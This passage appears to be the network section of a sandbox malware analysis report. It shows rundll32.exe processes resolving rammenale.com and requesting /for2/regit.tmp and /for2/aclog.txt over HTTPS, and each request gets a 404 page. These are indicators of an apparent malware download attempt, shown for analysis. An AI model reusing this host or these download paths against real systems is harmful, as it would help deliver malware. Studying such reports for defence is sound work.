            Aug 29, 2024 06:53:05.559623957 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.572508097 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.604494095 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.807389975 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.807445049 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.807465076 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.807502985 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.807540894 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.807590961 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.807631969 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.808008909 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.808008909 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.808026075 CEST44349712131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.808176994 CEST49712443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.811115026 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.811170101 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.811177969 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.811220884 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.811233997 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.811270952 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.811275959 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.811285019 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.811328888 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.811676979 CEST49715443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.811681032 CEST44349715131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.833579063 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.833663940 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.833677053 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.833714962 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.833983898 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.834064960 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.834079027 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.834117889 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.834119081 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.834141016 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.834141016 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.834146976 CEST44349714131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.834177017 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.834177017 CEST49714443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.892978907 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.893054962 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.893064976 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.893132925 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.893178940 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.893696070 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.893696070 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:05.893707991 CEST44349713131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:05.893762112 CEST49713443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.024373055 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.024497032 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.024543047 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.024563074 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.025106907 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.025120974 CEST44349717131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.025130033 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.025157928 CEST49717443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.040775061 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.040843964 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.040855885 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.040894032 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.040904045 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.040915012 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.040950060 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.041054010 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.041337013 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.041357040 CEST44349716131.153.206.231192.168.2.6
            Aug 29, 2024 06:53:06.041376114 CEST49716443192.168.2.6131.153.206.231
            Aug 29, 2024 06:53:06.041398048 CEST49716443192.168.2.6131.153.206.231

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 29, 2024 06:53:03.468719959 CEST6097053192.168.2.61.1.1.1
            Aug 29, 2024 06:53:04.165409088 CEST53609701.1.1.1192.168.2.6

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Aug 29, 2024 06:53:03.468719959 CEST192.168.2.61.1.1.10x3772Standard query (0)rammenale.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Aug 29, 2024 06:53:04.165409088 CEST1.1.1.1192.168.2.60x3772No error (0)rammenale.com131.153.206.231A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • rammenale.com

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.649715131.153.206.2314434988C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-29 04:53:05 UTC287OUTGET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.649716131.153.206.2314435432C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-29 04:53:05 UTC287OUTGET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:06 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:06 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:06 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.649712131.153.206.2314435308C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-29 04:53:05 UTC287OUTGET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.649714131.153.206.2314435332C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-29 04:53:05 UTC287OUTGET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:05 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.649717131.153.206.2314436136C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-29 04:53:05 UTC287OUTGET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:06 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:06 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-29 04:53:06 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.649713131.153.206.2314435960C:\Windows\SysWOW64\rundll32.exe
            TimestampBytes transferredDirectionData
            2024-08-29 04:53:05 UTC287OUTGET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-29 04:53:05 UTC416INHTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Thu, 29 Aug 2024 04:53:05 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-29 04:53:05 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
